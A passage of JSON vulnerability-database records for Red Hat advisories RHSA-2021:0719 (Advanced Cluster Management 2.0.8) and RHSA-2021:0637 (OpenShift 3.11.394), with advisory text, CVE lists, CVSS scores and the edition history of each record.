(CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-15T22:51:57", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-2308", "CVE-2020-12723", "CVE-2021-21609", "CVE-2020-16845", "CVE-2021-21607", "CVE-2020-2304", "CVE-2021-21608", "CVE-2020-25705", "CVE-2021-21606", "CVE-2020-2254", "CVE-2020-8564", "CVE-2020-2307", "CVE-2020-2306", "CVE-2021-21604", "CVE-2020-2305", "CVE-2020-35513", "CVE-2021-3121", "CVE-2020-10543", "CVE-2020-10029", "CVE-2020-8563", "CVE-2019-16541", "CVE-2020-29573", "CVE-2021-20230", "CVE-2020-11979", "CVE-2020-25211", "CVE-2020-1945", "CVE-2020-2252", "CVE-2020-2255", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2020-14040", "CVE-2019-25013", "CVE-2021-21610", "CVE-2020-2309", "CVE-2020-28362", "CVE-2020-14351", "CVE-2021-21611", "CVE-2020-29661", "CVE-2015-8011", "CVE-2020-14370", "CVE-2020-15436", "CVE-2020-10878", "CVE-2020-15586", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-03-15T19:56:33", "history": [], "viewCount": 57, "enchantments": {"dependencies": {"modified": "2021-03-15T19:56:33", "references": [{"idList": ["PERL_ADVISORY5.ASC"], "type": "aix"}, {"idList": ["ASA-202101-41"], "type": "archlinux"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0637.NASL", "REDHAT-RHSA-2020-5102.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "REDHAT-RHSA-2021-0034.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "CENTOS_RHSA-2021-0348.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2020-4297.NASL"], "type": "nessus"}, {"idList": ["FEDORA:017273129EBB", "FEDORA:481D1608F47B"], "type": "fedora"}, {"idList": ["ALAS2-2021-1610"], "type": "amazon"}, {"idList": ["CFOUNDRY:DC88CEA06ECA856893E7D089D36ADB07"], "type": "cloudfoundry"}, {"idList": ["OPENVAS:1361412562310877942", "OPENVAS:1361412562310877986", "OPENVAS:1361412562310853226"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2020:0850-1"], "type": "suse"}, {"idList": ["GLSA-202006-03"], "type": "gentoo"}, {"idList": ["CESA-2021:0343", "CESA-2021:0348"], "type": "centos"}, {"idList": ["USN-4602-2", "USN-4602-1"], "type": "ubuntu"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["ELSA-2021-0343", "ELSA-2021-0558", "ELSA-2021-0348"], "type": "oraclelinux"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0607", "RHSA-2021:0637", "RHSA-2020:4297", "RHSA-2021:0423", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0348", "RHSA-2020:5102", "RHSA-2021:0038"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-03-15T19:56:33", "rev": 2, "value": 6.0, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [], "vendorCvss": {}}, "lastseen": "2021-03-15T19:56:33", "differentElements": ["modified"], "edition": 2}, {"bulletin": {"id": "RHSA-2021:0719", "hash": "0e709a2405e6338ce6b14fbd87549d67", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-16T02:17:07", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-2308", "CVE-2020-12723", "CVE-2021-21609", "CVE-2020-16845", "CVE-2021-21607", "CVE-2020-2304", "CVE-2021-21608", "CVE-2020-25705", "CVE-2021-21606", "CVE-2020-2254", "CVE-2020-8564", "CVE-2020-2307", "CVE-2020-2306", "CVE-2021-21604", "CVE-2020-2305", "CVE-2020-35513", "CVE-2021-3121", "CVE-2020-10543", "CVE-2020-10029", "CVE-2020-8563", "CVE-2019-16541", "CVE-2020-29573", "CVE-2021-20230", "CVE-2020-11979", "CVE-2020-25211", "CVE-2020-1945", "CVE-2020-2252", "CVE-2020-2255", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2020-14040", "CVE-2019-25013", "CVE-2021-21610", "CVE-2020-2309", "CVE-2020-28362", "CVE-2020-14351", "CVE-2021-21611", "CVE-2020-29661", "CVE-2015-8011", "CVE-2020-14370", "CVE-2020-15436", "CVE-2020-10878", "CVE-2020-15586", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-03-16T00:28:30", "history": [], "viewCount": 63, "enchantments": {"dependencies": {"modified": "2021-03-16T00:28:30", "references": [{"idList": ["REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0637.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "REDHAT-RHSA-2021-0034.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2020-4297.NASL"], "type": "nessus"}, {"idList": ["ASA-202101-41"], "type": "archlinux"}, {"idList": ["RH:CVE-2021-21606", "RH:CVE-2021-21602", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21610"], "type": "redhatcve"}, {"idList": ["UB:CVE-2020-25705", "UB:CVE-2020-35513", "UB:CVE-2015-8011", "UB:CVE-2020-25211", "UB:CVE-2020-15436", "UB:CVE-2020-11979", "UB:CVE-2020-29661", "UB:CVE-2021-3121", "UB:CVE-2020-29573", "UB:CVE-2021-20230"], "type": "ubuntucve"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0607", "RHSA-2021:0637", "RHSA-2020:4297", "RHSA-2021:0423", "RHSA-2021:0172", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-03-16T00:28:30", "rev": 2, "value": 5.4, "vector": "NONE"}}, "objectVersion": "1.5", "affectedPackage": [], "vendorCvss": {}}, "lastseen": "2021-03-16T00:28:30", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "RHSA-2021:0719", "hash": "06c030c520e6898de1343a27fb705104", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-16T02:17:07", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-2308", "CVE-2020-12723", "CVE-2021-21609", "CVE-2020-16845", "CVE-2021-21607", "CVE-2020-2304", "CVE-2021-21608", "CVE-2020-25705", "CVE-2021-21606", "CVE-2020-2254", "CVE-2020-8564", "CVE-2020-2307", "CVE-2020-2306", "CVE-2021-21604", "CVE-2020-2305", "CVE-2020-35513", "CVE-2021-3121", "CVE-2020-10543", "CVE-2020-10029", "CVE-2020-8563", "CVE-2019-16541", "CVE-2020-29573", "CVE-2021-20230", "CVE-2020-11979", "CVE-2020-25211", "CVE-2020-1945", "CVE-2020-2252", "CVE-2020-2255", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2020-14040", "CVE-2019-25013", "CVE-2021-21610", "CVE-2020-2309", "CVE-2020-28362", "CVE-2020-14351", "CVE-2021-21611", "CVE-2020-29661", "CVE-2015-8011", "CVE-2020-14370", "CVE-2020-15436", "CVE-2020-10878", "CVE-2020-15586", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-07-28T14:35:50", "history": [], "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0172", "RHSA-2021:0423", "RHSA-2021:0034", "RHSA-2021:0607", "RHSA-2021:0429", "RHSA-2021:0039", "RHSA-2021:0038", "RHSA-2020:4297", "RHSA-2021:0637"]}, {"type": "nessus", "idList": ["JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0034.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2020-4297.NASL", "REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0637.NASL", "REDHAT-RHSA-2021-0423.NASL"]}, {"type": "archlinux", "idList": ["ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21602", "RH:CVE-2021-21609", "RH:CVE-2021-21608", "RH:CVE-2021-21607", "RH:CVE-2021-21610", "RH:CVE-2021-21604", "RH:CVE-2021-21606"]}, {"type": "cve", "idList": ["CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21609", "CVE-2021-21615", "CVE-2021-21607", "CVE-2021-21604", "CVE-2021-21603", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-12723", "UB:CVE-2020-35513", "UB:CVE-2015-8011", "UB:CVE-2020-10543", "UB:CVE-2020-14370", "UB:CVE-2020-11979", "UB:CVE-2021-20230", "UB:CVE-2020-25705", "UB:CVE-2020-15436", "UB:CVE-2020-29573"]}], "modified": "2021-07-28T14:35:50", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-07-28T14:35:50", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [], "vendorCvss": {}}, "lastseen": "2021-07-28T14:35:50", "differentElements": ["cvss3"], "edition": 4}, {"bulletin": {"id": "RHSA-2021:0719", "hash": "27cde5958d3ccd413a974da0aea0fe69af191fad6b3714684554499cdcd4e2b6", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-16T02:17:07", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2015-8011", "CVE-2019-16541", "CVE-2019-25013", "CVE-2020-10029", "CVE-2020-10543", "CVE-2020-10878", "CVE-2020-11979", "CVE-2020-12723", "CVE-2020-14040", "CVE-2020-14351", "CVE-2020-14370", "CVE-2020-15436", "CVE-2020-15586", "CVE-2020-16845", "CVE-2020-1945", "CVE-2020-2252", "CVE-2020-2254", "CVE-2020-2255", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25211", "CVE-2020-25705", "CVE-2020-28362", "CVE-2020-29573", "CVE-2020-29661", "CVE-2020-35513", "CVE-2020-8563", "CVE-2020-8564", "CVE-2021-20230", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615", "CVE-2021-3121"], "immutableFields": [], "lastseen": "2021-07-28T14:35:50", "history": [], "viewCount": 63, "enchantments": {"dependencies": {"modified": "2021-03-16T00:28:30", "references": [{"idList": ["REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0637.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "REDHAT-RHSA-2021-0034.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2020-4297.NASL"], "type": "nessus"}, {"idList": ["ASA-202101-41"], "type": "archlinux"}, {"idList": ["RH:CVE-2021-21606", "RH:CVE-2021-21602", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21610"], "type": "redhatcve"}, {"idList": ["UB:CVE-2020-25705", "UB:CVE-2020-35513", "UB:CVE-2015-8011", "UB:CVE-2020-25211", "UB:CVE-2020-15436", "UB:CVE-2020-11979", "UB:CVE-2020-29661", "UB:CVE-2021-3121", "UB:CVE-2020-29573", "UB:CVE-2021-20230"], "type": "ubuntucve"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0607", "RHSA-2021:0637", "RHSA-2020:4297", "RHSA-2021:0423", "RHSA-2021:0172", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-03-16T00:28:30", "rev": 2, "value": 5.4, "vector": "NONE"}}, "objectVersion": "1.6", "affectedPackage": [], "vendorCvss": {}}, "lastseen": "2021-07-28T14:35:50", "differentElements": ["cvss3", "vendorCvss"], "edition": 5}], "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0607", "RHSA-2021:0429", "RHSA-2021:0423", "RHSA-2020:4297", "RHSA-2021:0172", "RHSA-2021:0038", "RHSA-2021:0034", "RHSA-2021:0039"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0038.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0637.NASL", "REDHAT-RHSA-2020-4297.NASL", "REDHAT-RHSA-2021-0034.NASL"]}, {"type": "archlinux", "idList": ["ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21607", "RH:CVE-2020-14370", "RH:CVE-2021-21610", "RH:CVE-2021-20230", "RH:CVE-2019-25013", "RH:CVE-2020-8563", "RH:CVE-2020-15586", "RH:CVE-2020-15436", "RH:CVE-2020-25211", "RH:CVE-2020-11979", "RH:CVE-2021-21603", "RH:CVE-2020-2306", "RH:CVE-2021-21606", "RH:CVE-2020-35513", "RH:CVE-2019-16541", "RH:CVE-2020-29661", "RH:CVE-2020-8564", "RH:CVE-2020-12723", "RH:CVE-2020-10543", "RH:CVE-2020-10029", "RH:CVE-2021-21602", "RH:CVE-2020-29573", "RH:CVE-2021-21604", "RH:CVE-2021-21609", "RH:CVE-2021-21605", "RH:CVE-2020-2255", "RH:CVE-2020-2254", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21608", "RH:CVE-2020-28362"]}, {"type": "cve", "idList": ["CVE-2020-12723", "CVE-2020-14370", "CVE-2020-11979", "CVE-2020-8564", "CVE-2015-8011", "CVE-2020-2255", "CVE-2020-10543", "CVE-2021-21602", "CVE-2019-16541", "CVE-2021-21604", "CVE-2021-21608", "CVE-2020-25211", "CVE-2021-21607", "CVE-2021-20230", "CVE-2020-8563", "CVE-2020-29661", "CVE-2021-21615", "CVE-2020-29573", "CVE-2020-2306", "CVE-2020-15586", "CVE-2020-25705", "CVE-2020-15436", "CVE-2021-21611", "CVE-2021-21610", "CVE-2020-28362", "CVE-2021-21609", "CVE-2020-2254", "CVE-2021-21603", "CVE-2021-21605", "CVE-2019-25013", "CVE-2021-21606", "CVE-2020-35513"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1632261812", "CLSA-2021:1632261839"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-28362", "UB:CVE-2020-8564", "UB:CVE-2020-11979", "UB:CVE-2015-8011", "UB:CVE-2020-15436", "UB:CVE-2020-35513", "UB:CVE-2019-25013", "UB:CVE-2020-29661", "UB:CVE-2021-20230", "UB:CVE-2020-25211", "UB:CVE-2020-10543", "UB:CVE-2020-8563", "UB:CVE-2020-14370", "UB:CVE-2020-15586", "UB:CVE-2020-12723", "UB:CVE-2020-25705", "UB:CVE-2020-29573"]}], "modified": "2021-08-25T20:37:40", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-08-25T20:37:40", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [], "vendorCvss": {"severity": "moderate"}, "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"]}, {"id": "RHSA-2021:0637", "hash": "6dad41823c2ef7c81a8564ecf4aeba77", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0637) Important: OpenShift Container Platform 3.11.394 bug fix and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* ant: Insecure temporary file vulnerability (CVE-2020-1945)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes plug-in (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes plug-in allows enumerating credentials IDs (CVE-2020-2309)\n\n* ant: Insecure temporary file (CVE-2020-11979)\n\n* python-rsa: Bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 3.11.394. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0638\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update fixes the following bugs among others:\n\n* Previously, the restart-cluster playbook did not evaluate the defined cluster size for ops clusters. This was causing come clusters to never complete their restart. This bug fix passes the logging ops cluster size, allowing restarts of ops clusters to complete successfully. (BZ#1879407)\n\n* Previously, the `openshift_named_certificates` role checked the contents of the `ca-bundle.crt` file during cluster installation. This caused the check to fail during initial installation because the `ca-bundle.crt` file is not yet created in that scenario. This bug fix allows the cluster to skip checking the `ca-bundle.crt` file if it does not exist, resulting in initial installations succeeding. (BZ#1920567)\n\n* Previously, if the `openshift_release` attribute was not set in the Ansible inventory file, the nodes of the cluster would fail during an upgrade. This was caused by the `cluster_facts.yml` file being gathered before the `openshift_release` attribute was defined by the upgrade playbook. Now the `cluster_facts.yml` file is gathered after the `openshift_version` role runs and the `openshift_release` attribute is set, allowing for successful node upgrades. (BZ#1921353)\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.", "published": "2021-03-03T17:05:11", "modified": "2021-03-30T18:34:36", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0637", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25658", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611"], "immutableFields": [], "lastseen": "2021-08-25T20:36:56", "history": [{"bulletin": {"id": "RHSA-2021:0637", "hash": "546a0dd5572673bdfbedf36c7bc0e8e8", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0637) Important: OpenShift Container Platform 3.11.394 bug fix and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* ant: Insecure temporary file vulnerability (CVE-2020-1945)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes plug-in (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes plug-in allows enumerating credentials IDs (CVE-2020-2309)\n\n* ant: Insecure temporary file (CVE-2020-11979)\n\n* python-rsa: Bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 3.11.394. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0638\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update fixes the following bugs among others:\n\n* Previously, the restart-cluster playbook did not evaluate the defined cluster size for ops clusters. This was causing come clusters to never complete their restart. This bug fix passes the logging ops cluster size, allowing restarts of ops clusters to complete successfully. (BZ#1879407)\n\n* Previously, the `openshift_named_certificates` role checked the contents of the `ca-bundle.crt` file during cluster installation. This caused the check to fail during initial installation because the `ca-bundle.crt` file is not yet created in that scenario. This bug fix allows the cluster to skip checking the `ca-bundle.crt` file if it does not exist, resulting in initial installations succeeding. (BZ#1920567)\n\n* Previously, if the `openshift_release` attribute was not set in the Ansible inventory file, the nodes of the cluster would fail during an upgrade. This was caused by the `cluster_facts.yml` file being gathered before the `openshift_release` attribute was defined by the upgrade playbook. Now the `cluster_facts.yml` file is gathered after the `openshift_version` role runs and the `openshift_release` attribute is set, allowing for successful node upgrades. (BZ#1921353)\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to these 